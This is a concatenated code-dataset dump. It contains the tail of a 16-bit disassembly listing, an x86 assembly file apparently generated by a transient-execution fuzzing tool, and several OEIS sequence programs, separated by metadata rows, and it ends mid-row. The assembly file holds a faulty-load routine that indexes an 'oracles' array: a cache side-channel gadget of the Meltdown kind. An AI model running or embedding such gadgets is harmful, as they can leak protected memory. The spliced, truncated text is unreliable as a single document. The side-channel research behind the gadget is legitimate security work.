0x010E (0x00021C) 0x7028- f:00070 d: 40 | P = P + 40 (0x0136)
0x010F (0x00021E) 0x0200- f:00001 d: 0 | EXIT
0x0110 (0x000220) 0x211B- f:00020 d: 283 | A = OR[283]
0x0111 (0x000222) 0x8602- f:00103 d: 2 | P = P + 2 (0x0113), A # 0
0x0112 (0x000224) 0x7013- f:00070 d: 19 | P = P + 19 (0x0125)
0x0113 (0x000226) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x0114 (0x000228) 0x2928- f:00024 d: 296 | OR[296] = A
0x0115 (0x00022A) 0x1800-0x00E8 f:00014 d: 0 | A = 232 (0x00E8)
0x0117 (0x00022E) 0x2929- f:00024 d: 297 | OR[297] = A
0x0118 (0x000230) 0x211A- f:00020 d: 282 | A = OR[282]
0x0119 (0x000232) 0x292A- f:00024 d: 298 | OR[298] = A
0x011A (0x000234) 0x211B- f:00020 d: 283 | A = OR[283]
0x011B (0x000236) 0x292B- f:00024 d: 299 | OR[299] = A
0x011C (0x000238) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x011D (0x00023A) 0x292C- f:00024 d: 300 | OR[300] = A
0x011E (0x00023C) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x011F (0x00023E) 0x292D- f:00024 d: 301 | OR[301] = A
0x0120 (0x000240) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x0121 (0x000242) 0x5800- f:00054 d: 0 | B = A
0x0122 (0x000244) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x0124 (0x000248) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0125 (0x00024A) 0x1006- f:00010 d: 6 | A = 6 (0x0006)
0x0126 (0x00024C) 0x290D- f:00024 d: 269 | OR[269] = A
0x0127 (0x00024E) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x0128 (0x000250) 0x2928- f:00024 d: 296 | OR[296] = A
0x0129 (0x000252) 0x1800-0x00A5 f:00014 d: 0 | A = 165 (0x00A5)
0x012B (0x000256) 0x2929- f:00024 d: 297 | OR[297] = A
0x012C (0x000258) 0x211A- f:00020 d: 282 | A = OR[282]
0x012D (0x00025A) 0x292A- f:00024 d: 298 | OR[298] = A
0x012E (0x00025C) 0x210D- f:00020 d: 269 | A = OR[269]
0x012F (0x00025E) 0x292B- f:00024 d: 299 | OR[299] = A
0x0130 (0x000260) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x0131 (0x000262) 0x5800- f:00054 d: 0 | B = A
0x0132 (0x000264) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x0134 (0x000268) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0135 (0x00026A) 0x0200- f:00001 d: 0 | EXIT
0x0136 (0x00026C) 0x2119- f:00020 d: 281 | A = OR[281]
0x0137 (0x00026E) 0x1605- f:00013 d: 5 | A = A - 5 (0x0005)
0x0138 (0x000270) 0x8402- f:00102 d: 2 | P = P + 2 (0x013A), A = 0
0x0139 (0x000272) 0x7005- f:00070 d: 5 | P = P + 5 (0x013E)
0x013A (0x000274) 0x1800-0x0646 f:00014 d: 0 | A = 1606 (0x0646)
0x013C (0x000278) 0x2919- f:00024 d: 281 | OR[281] = A
0x013D (0x00027A) 0x7023- f:00070 d: 35 | P = P + 35 (0x0160)
0x013E (0x00027C) 0x2119- f:00020 d: 281 | A = OR[281]
0x013F (0x00027E) 0x160A- f:00013 d: 10 | A = A - 10 (0x000A)
0x0140 (0x000280) 0x8402- f:00102 d: 2 | P = P + 2 (0x0142), A = 0
0x0141 (0x000282) 0x7005- f:00070 d: 5 | P = P + 5 (0x0146)
0x0142 (0x000284) 0x1800-0x064E f:00014 d: 0 | A = 1614 (0x064E)
0x0144 (0x000288) 0x2919- f:00024 d: 281 | OR[281] = A
0x0145 (0x00028A) 0x701B- f:00070 d: 27 | P = P + 27 (0x0160)
0x0146 (0x00028C) 0x2119- f:00020 d: 281 | A = OR[281]
0x0147 (0x00028E) 0x1608- f:00013 d: 8 | A = A - 8 (0x0008)
0x0148 (0x000290) 0x8402- f:00102 d: 2 | P = P + 2 (0x014A), A = 0
0x0149 (0x000292) 0x7005- f:00070 d: 5 | P = P + 5 (0x014E)
0x014A (0x000294) 0x1800-0x0649 f:00014 d: 0 | A = 1609 (0x0649)
0x014C (0x000298) 0x2919- f:00024 d: 281 | OR[281] = A
0x014D (0x00029A) 0x7013- f:00070 d: 19 | P = P + 19 (0x0160)
0x014E (0x00029C) 0x2119- f:00020 d: 281 | A = OR[281]
0x014F (0x00029E) 0x1609- f:00013 d: 9 | A = A - 9 (0x0009)
0x0150 (0x0002A0) 0x8402- f:00102 d: 2 | P = P + 2 (0x0152), A = 0
0x0151 (0x0002A2) 0x7005- f:00070 d: 5 | P = P + 5 (0x0156)
0x0152 (0x0002A4) 0x1800-0x064D f:00014 d: 0 | A = 1613 (0x064D)
0x0154 (0x0002A8) 0x2919- f:00024 d: 281 | OR[281] = A
0x0155 (0x0002AA) 0x700B- f:00070 d: 11 | P = P + 11 (0x0160)
0x0156 (0x0002AC) 0x2119- f:00020 d: 281 | A = OR[281]
0x0157 (0x0002AE) 0x1602- f:00013 d: 2 | A = A - 2 (0x0002)
0x0158 (0x0002B0) 0x8405- f:00102 d: 5 | P = P + 5 (0x015D), A = 0
0x0159 (0x0002B2) 0x2119- f:00020 d: 281 | A = OR[281]
0x015A (0x0002B4) 0x1603- f:00013 d: 3 | A = A - 3 (0x0003)
0x015B (0x0002B6) 0x8402- f:00102 d: 2 | P = P + 2 (0x015D), A = 0
0x015C (0x0002B8) 0x7004- f:00070 d: 4 | P = P + 4 (0x0160)
0x015D (0x0002BA) 0x1800-0x064C f:00014 d: 0 | A = 1612 (0x064C)
0x015F (0x0002BE) 0x2919- f:00024 d: 281 | OR[281] = A
0x0160 (0x0002C0) 0x7310- f:00071 d: 272 | P = P - 272 (0x0050)
0x0161 (0x0002C2) 0x1800-0xFFFF f:00014 d: 0 | A = 65535 (0xFFFF)
0x0163 (0x0002C6) 0x290D- f:00024 d: 269 | OR[269] = A
0x0164 (0x0002C8) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0165 (0x0002CA) 0x290E- f:00024 d: 270 | OR[270] = A
0x0166 (0x0002CC) 0x2006- f:00020 d: 6 | A = OR[6]
0x0167 (0x0002CE) 0x2910- f:00024 d: 272 | OR[272] = A
0x0168 (0x0002D0) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x0169 (0x0002D2) 0x2928- f:00024 d: 296 | OR[296] = A
0x016A (0x0002D4) 0x1800-0x00A9 f:00014 d: 0 | A = 169 (0x00A9)
0x016C (0x0002D8) 0x2929- f:00024 d: 297 | OR[297] = A
0x016D (0x0002DA) 0x1800-0x5052 f:00014 d: 0 | A = 20562 (0x5052)
0x016F (0x0002DE) 0x292A- f:00024 d: 298 | OR[298] = A
0x0170 (0x0002E0) 0x210D- f:00020 d: 269 | A = OR[269]
0x0171 (0x0002E2) 0x292B- f:00024 d: 299 | OR[299] = A
0x0172 (0x0002E4) 0x1800-0x5054 f:00014 d: 0 | A = 20564 (0x5054)
0x0174 (0x0002E8) 0x292C- f:00024 d: 300 | OR[300] = A
0x0175 (0x0002EA) 0x210E- f:00020 d: 270 | A = OR[270]
0x0176 (0x0002EC) 0x292D- f:00024 d: 301 | OR[301] = A
0x0177 (0x0002EE) 0x210F- f:00020 d: 271 | A = OR[271]
0x0178 (0x0002F0) 0x292E- f:00024 d: 302 | OR[302] = A
0x0179 (0x0002F2) 0x2110- f:00020 d: 272 | A = OR[272]
0x017A (0x0002F4) 0x292F- f:00024 d: 303 | OR[303] = A
0x017B (0x0002F6) 0x1010- f:00010 d: 16 | A = 16 (0x0010)
0x017C (0x0002F8) 0x2930- f:00024 d: 304 | OR[304] = A
0x017D (0x0002FA) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x017E (0x0002FC) 0x5800- f:00054 d: 0 | B = A
0x017F (0x0002FE) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x0181 (0x000302) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0182 (0x000304) 0x2919- f:00024 d: 281 | OR[281] = A
0x0183 (0x000306) 0x2119- f:00020 d: 281 | A = OR[281]
0x0184 (0x000308) 0x8602- f:00103 d: 2 | P = P + 2 (0x0186), A # 0
0x0185 (0x00030A) 0x7003- f:00070 d: 3 | P = P + 3 (0x0188)
0x0186 (0x00030C) 0x7A03-0x0209 f:00075 d: 3 | P = OR[3]+521 (0x0209)
0x0188 (0x000310) 0x0200- f:00001 d: 0 | EXIT
0x0189 (0x000312) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x018A (0x000314) 0x2927- f:00024 d: 295 | OR[295] = A
0x018B (0x000316) 0x2127- f:00020 d: 295 | A = OR[295]
0x018C (0x000318) 0x1E00-0x0800 f:00017 d: 0 | A = A - 2048 (0x0800)
0x018E (0x00031C) 0x8246- f:00101 d: 70 | P = P + 70 (0x01D4), C = 1
0x018F (0x00031E) 0x1040- f:00010 d: 64 | A = 64 (0x0040)
0x0190 (0x000320) 0x2926- f:00024 d: 294 | OR[294] = A
0x0191 (0x000322) 0x211D- f:00020 d: 285 | A = OR[285]
0x0192 (0x000324) 0x2527- f:00022 d: 295 | A = A + OR[295]
0x0193 (0x000326) 0x2913- f:00024 d: 275 | OR[275] = A
0x0194 (0x000328) 0x2113- f:00020 d: 275 | A = OR[275]
0x0195 (0x00032A) 0x290D- f:00024 d: 269 | OR[269] = A
0x0196 (0x00032C) 0x211E- f:00020 d: 286 | A = OR[286]
0x0197 (0x00032E) 0x1401- f:00012 d: 1 | A = A + 1 (0x0001)
0x0198 (0x000330) 0x290E- f:00024 d: 270 | OR[270] = A
0x0199 (0x000332) 0x2126- f:00020 d: 294 | A = OR[294]
0x019A (0x000334) 0x290F- f:00024 d: 271 | OR[271] = A
0x019B (0x000336) 0x7006- f:00070 d: 6 | P = P + 6 (0x01A1)
0x019C (0x000338) 0x310D- f:00030 d: 269 | A = (OR[269])
0x019D (0x00033A) 0x390E- f:00034 d: 270 | (OR[270]) = A
0x019E (0x00033C) 0x2D0D- f:00026 d: 269 | OR[269] = OR[269] + 1
0x019F (0x00033E) 0x2D0E- f:00026 d: 270 | OR[270] = OR[270] + 1
0x01A0 (0x000340) 0x2F0F- f:00027 d: 271 | OR[271] = OR[271] - 1
0x01A1 (0x000342) 0x210F- f:00020 d: 271 | A = OR[271]
0x01A2 (0x000344) 0x8E06- f:00107 d: 6 | P = P - 6 (0x019C), A # 0
0x01A3 (0x000346) 0x7432- f:00072 d: 50 | R = P + 50 (0x01D5)
0x01A4 (0x000348) 0x2127- f:00020 d: 295 | A = OR[295]
0x01A5 (0x00034A) 0x2526- f:00022 d: 294 | A = A + OR[294]
0x01A6 (0x00034C) 0x2927- f:00024 d: 295 | OR[295] = A
0x01A7 (0x00034E) 0x211C- f:00020 d: 284 | A = OR[284]
0x01A8 (0x000350) 0x1402- f:00012 d: 2 | A = A + 2 (0x0002)
0x01A9 (0x000352) 0x2908- f:00024 d: 264 | OR[264] = A
0x01AA (0x000354) 0x3108- f:00030 d: 264 | A = (OR[264])
0x01AB (0x000356) 0x160D- f:00013 d: 13 | A = A - 13 (0x000D)
0x01AC (0x000358) 0x8402- f:00102 d: 2 | P = P + 2 (0x01AE), A = 0
0x01AD (0x00035A) 0x7026- f:00070 d: 38 | P = P + 38 (0x01D3)
0x01AE (0x00035C) 0x211D- f:00020 d: 285 | A = OR[285]
0x01AF (0x00035E) 0x2527- f:00022 d: 295 | A = A + OR[295]
0x01B0 (0x000360) 0x2913- f:00024 d: 275 | OR[275] = A
0x01B1 (0x000362) 0x2113- f:00020 d: 275 | A = OR[275]
0x01B2 (0x000364) 0x290D- f:00024 d: 269 | OR[269] = A
0x01B3 (0x000366) 0x211E- f:00020 d: 286 | A = OR[286]
0x01B4 (0x000368) 0x1401- f:00012 d: 1 | A = A + 1 (0x0001)
0x01B5 (0x00036A) 0x290E- f:00024 d: 270 | OR[270] = A
0x01B6 (0x00036C) 0x2126- f:00020 d: 294 | A = OR[294]
0x01B7 (0x00036E) 0x290F- f:00024 d: 271 | OR[271] = A
0x01B8 (0x000370) 0x7006- f:00070 d: 6 | P = P + 6 (0x01BE)
0x01B9 (0x000372) 0x310D- f:00030 d: 269 | A = (OR[269])
0x01BA (0x000374) 0x390E- f:00034 d: 270 | (OR[270]) = A
0x01BB (0x000376) 0x2D0D- f:00026 d: 269 | OR[269] = OR[269] + 1
0x01BC (0x000378) 0x2D0E- f:00026 d: 270 | OR[270] = OR[270] + 1
0x01BD (0x00037A) 0x2F0F- f:00027 d: 271 | OR[271] = OR[271] - 1
0x01BE (0x00037C) 0x210F- f:00020 d: 271 | A = OR[271]
0x01BF (0x00037E) 0x8E06- f:00107 d: 6 | P = P - 6 (0x01B9), A # 0
0x01C0 (0x000380) 0x7415- f:00072 d: 21 | R = P + 21 (0x01D5)
0x01C1 (0x000382) 0x2127- f:00020 d: 295 | A = OR[295]
0x01C2 (0x000384) 0x2526- f:00022 d: 294 | A = A + OR[294]
0x01C3 (0x000386) 0x2927- f:00024 d: 295 | OR[295] = A
0x01C4 (0x000388) 0x1004- f:00010 d: 4 | A = 4 (0x0004)
0x01C5 (0x00038A) 0x2926- f:00024 d: 294 | OR[294] = A
0x01C6 (0x00038C) 0x211E- f:00020 d: 286 | A = OR[286]
0x01C7 (0x00038E) 0x1401- f:00012 d: 1 | A = A + 1 (0x0001)
0x01C8 (0x000390) 0x290E- f:00024 d: 270 | OR[270] = A
0x01C9 (0x000392) 0x2126- f:00020 d: 294 | A = OR[294]
0x01CA (0x000394) 0x290D- f:00024 d: 269 | OR[269] = A
0x01CB (0x000396) 0x210D- f:00020 d: 269 | A = OR[269]
0x01CC (0x000398) 0x8406- f:00102 d: 6 | P = P + 6 (0x01D2), A = 0
0x01CD (0x00039A) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x01CE (0x00039C) 0x390E- f:00034 d: 270 | (OR[270]) = A
0x01CF (0x00039E) 0x2F0D- f:00027 d: 269 | OR[269] = OR[269] - 1
0x01D0 (0x0003A0) 0x2D0E- f:00026 d: 270 | OR[270] = OR[270] + 1
0x01D1 (0x0003A2) 0x7206- f:00071 d: 6 | P = P - 6 (0x01CB)
0x01D2 (0x0003A4) 0x7403- f:00072 d: 3 | R = P + 3 (0x01D5)
0x01D3 (0x0003A6) 0x7248- f:00071 d: 72 | P = P - 72 (0x018B)
0x01D4 (0x0003A8) 0x0200- f:00001 d: 0 | EXIT
0x01D5 (0x0003AA) 0x211C- f:00020 d: 284 | A = OR[284]
0x01D6 (0x0003AC) 0x1403- f:00012 d: 3 | A = A + 3 (0x0003)
0x01D7 (0x0003AE) 0x2908- f:00024 d: 264 | OR[264] = A
0x01D8 (0x0003B0) 0x3108- f:00030 d: 264 | A = (OR[264])
0x01D9 (0x0003B2) 0x290D- f:00024 d: 269 | OR[269] = A
0x01DA (0x0003B4) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x01DB (0x0003B6) 0x2928- f:00024 d: 296 | OR[296] = A
0x01DC (0x0003B8) 0x210D- f:00020 d: 269 | A = OR[269]
0x01DD (0x0003BA) 0x2929- f:00024 d: 297 | OR[297] = A
0x01DE (0x0003BC) 0x211C- f:00020 d: 284 | A = OR[284]
0x01DF (0x0003BE) 0x292A- f:00024 d: 298 | OR[298] = A
0x01E0 (0x0003C0) 0x1003- f:00010 d: 3 | A = 3 (0x0003)
0x01E1 (0x0003C2) 0x292B- f:00024 d: 299 | OR[299] = A
0x01E2 (0x0003C4) 0x211E- f:00020 d: 286 | A = OR[286]
0x01E3 (0x0003C6) 0x292C- f:00024 d: 300 | OR[300] = A
0x01E4 (0x0003C8) 0x2126- f:00020 d: 294 | A = OR[294]
0x01E5 (0x0003CA) 0x292D- f:00024 d: 301 | OR[301] = A
0x01E6 (0x0003CC) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x01E7 (0x0003CE) 0x5800- f:00054 d: 0 | B = A
0x01E8 (0x0003D0) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x01EA (0x0003D4) 0x7C09- f:00076 d: 9 | R = OR[9]
0x01EB (0x0003D6) 0x2919- f:00024 d: 281 | OR[281] = A
0x01EC (0x0003D8) 0x2119- f:00020 d: 281 | A = OR[281]
0x01ED (0x0003DA) 0x8602- f:00103 d: 2 | P = P + 2 (0x01EF), A # 0
0x01EE (0x0003DC) 0x7003- f:00070 d: 3 | P = P + 3 (0x01F1)
0x01EF (0x0003DE) 0x7A03-0x0209 f:00075 d: 3 | P = OR[3]+521 (0x0209)
0x01F1 (0x0003E2) 0x0200- f:00001 d: 0 | EXIT
0x01F2 (0x0003E4) 0x1006- f:00010 d: 6 | A = 6 (0x0006)
0x01F3 (0x0003E6) 0x290D- f:00024 d: 269 | OR[269] = A
0x01F4 (0x0003E8) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x01F5 (0x0003EA) 0x2928- f:00024 d: 296 | OR[296] = A
0x01F6 (0x0003EC) 0x1800-0x00A5 f:00014 d: 0 | A = 165 (0x00A5)
0x01F8 (0x0003F0) 0x2929- f:00024 d: 297 | OR[297] = A
0x01F9 (0x0003F2) 0x211C- f:00020 d: 284 | A = OR[284]
0x01FA (0x0003F4) 0x292A- f:00024 d: 298 | OR[298] = A
0x01FB (0x0003F6) 0x210D- f:00020 d: 269 | A = OR[269]
0x01FC (0x0003F8) 0x292B- f:00024 d: 299 | OR[299] = A
0x01FD (0x0003FA) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x01FE (0x0003FC) 0x5800- f:00054 d: 0 | B = A
0x01FF (0x0003FE) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x0201 (0x000402) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0202 (0x000404) 0x0200- f:00001 d: 0 | EXIT
0x0203 (0x000406) 0x2119- f:00020 d: 281 | A = OR[281]
0x0204 (0x000408) 0x1605- f:00013 d: 5 | A = A - 5 (0x0005)
0x0205 (0x00040A) 0x8402- f:00102 d: 2 | P = P + 2 (0x0207), A = 0
0x0206 (0x00040C) 0x7005- f:00070 d: 5 | P = P + 5 (0x020B)
0x0207 (0x00040E) 0x1800-0x0644 f:00014 d: 0 | A = 1604 (0x0644)
0x0209 (0x000412) 0x2919- f:00024 d: 281 | OR[281] = A
0x020A (0x000414) 0x7013- f:00070 d: 19 | P = P + 19 (0x021D)
0x020B (0x000416) 0x2119- f:00020 d: 281 | A = OR[281]
0x020C (0x000418) 0x1608- f:00013 d: 8 | A = A - 8 (0x0008)
0x020D (0x00041A) 0x8402- f:00102 d: 2 | P = P + 2 (0x020F), A = 0
0x020E (0x00041C) 0x7005- f:00070 d: 5 | P = P + 5 (0x0213)
0x020F (0x00041E) 0x1800-0x0647 f:00014 d: 0 | A = 1607 (0x0647)
0x0211 (0x000422) 0x2919- f:00024 d: 281 | OR[281] = A
0x0212 (0x000424) 0x700B- f:00070 d: 11 | P = P + 11 (0x021D)
0x0213 (0x000426) 0x2119- f:00020 d: 281 | A = OR[281]
0x0214 (0x000428) 0x1602- f:00013 d: 2 | A = A - 2 (0x0002)
0x0215 (0x00042A) 0x8405- f:00102 d: 5 | P = P + 5 (0x021A), A = 0
0x0216 (0x00042C) 0x2119- f:00020 d: 281 | A = OR[281]
0x0217 (0x00042E) 0x1603- f:00013 d: 3 | A = A - 3 (0x0003)
0x0218 (0x000430) 0x8402- f:00102 d: 2 | P = P + 2 (0x021A), A = 0
0x0219 (0x000432) 0x7004- f:00070 d: 4 | P = P + 4 (0x021D)
0x021A (0x000434) 0x1800-0x064A f:00014 d: 0 | A = 1610 (0x064A)
0x021C (0x000438) 0x2919- f:00024 d: 281 | OR[281] = A
0x021D (0x00043A) 0x73CD- f:00071 d: 461 | P = P - 461 (0x0050)
0x021E (0x00043C) 0x0000- f:00000 d: 0 | PASS
0x021F (0x00043E) 0x0000- f:00000 d: 0 | PASS
| 79.842829 | 79 | 0.464222 |
4746be3cfb2c4d5616a862bb11f1dbf9d7a2663b | 4,094 | asm | Assembly | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0x48.log_21829_792.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 9 | 2020-08-13T19:41:58.000Z | 2022-03-30T12:22:51.000Z | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0x48.log_21829_792.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 1 | 2021-04-29T06:29:35.000Z | 2021-05-13T21:02:30.000Z | Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0x48.log_21829_792.asm | ljhsiun2/medusa | 67d769b8a2fb42c538f10287abaf0e6dbb463f0c | [
"MIT"
] | 3 | 2020-07-14T17:07:07.000Z | 2022-03-21T01:12:22.000Z | .global s_prepare_buffers
s_prepare_buffers:
push %r14
push %rax
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0x1d906, %rsi
lea addresses_normal_ht+0x145e6, %rdi
clflush (%rdi)
nop
nop
nop
nop
nop
sub %rax, %rax
mov $73, %rcx
rep movsq
nop
add $50926, %r14
pop %rsi
pop %rdi
pop %rcx
pop %rax
pop %r14
ret
.global s_faulty_load
s_faulty_load:
push %r15
push %r8
push %r9
push %rax
push %rbx
push %rdi
// Faulty Load
lea addresses_D+0xbb96, %rax
nop
and %rdi, %rdi
mov (%rax), %r15d
lea oracles, %r8
and $0xff, %r15
shlq $12, %r15
mov (%r8,%r15,1), %r15
pop %rdi
pop %rbx
pop %rax
pop %r9
pop %r8
pop %r15
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_D', 'AVXalign': False, 'congruent': 0, 'size': 8, 'same': False, 'NT': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_D', 'AVXalign': False, 'congruent': 0, 'size': 4, 'same': True, 'NT': False}}
<gen_prepare_buffer>
{'OP': 'REPM', 'src': {'type': 'addresses_WT_ht', 'congruent': 4, 'same': False}, 'dst': {'type': 'addresses_normal_ht', 'congruent': 4, 'same': False}}
{'36': 21829}
36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36 36
*/
| 62.984615 | 2,999 | 0.664143 |
9a19de556a1accfdab53319d3759e0f1139dbd12 | 439 | asm | Assembly | programs/oeis/088/A088564.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/088/A088564.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 41 | 2021-02-22T19:00:34.000Z | 2021-08-28T10:47:47.000Z | programs/oeis/088/A088564.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 5 | 2021-02-24T21:14:16.000Z | 2021-08-09T19:48:05.000Z | ; A088564: a(n)=sum(i=0,n,binomial(2*i,i) (mod 3)).
; 1,3,3,5,6,6,6,6,6,8,9,9,10,12,12,12,12,12,12,12,12,12,12,12,12,12,12,14,15,15,16,18,18,18,18,18,19,21,21,23,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,26,27,27,28,30,30,30,30,30,31,33,33,35,36,36,36,36,36,36
lpb $0
mov $2,$0
sub $0,1
seq $2,6996 ; C(2n,n) mod 3.
add $1,$2
lpe
add $1,1
mov $0,$1
| 36.583333 | 289 | 0.605923 |
c964323fbc34191895e6d02040d938ccdcd2d9a9 | 480 | asm | Assembly | oeis/081/A081729.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/081/A081729.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/081/A081729.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A081729: Expansion of Sum(k>=0, x^(2^k)) + 1/(1+x). First differences of A007456 (gossip sequence) for n>1.
; Submitted by Jamie Morken(s3)
; 1,0,2,-1,2,-1,1,-1,2,-1,1,-1,1,-1,1,-1,2,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,2,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,2,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1,1,-1
lpb $0
dif $0,2
mov $1,2
lpe
lpb $0
mov $0,1
sub $1,1
lpe
bin $1,$0
mov $0,$1
| 32 | 250 | 0.502083 |
1925e8d2a4f2d1ed0ad0ecb3a47e416ecdb92b99 | 353 | asm | Assembly | programs/oeis/276/A276881.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
] | 22 | 2018-02-06T19:19:31.000Z | 2022-01-17T21:53:31.000Z | programs/oeis/276/A276881.asm | neoneye/loda | afe9559fb53ee12e3040da54bd6aa47283e0d9ec | [
"Apache-2.0"
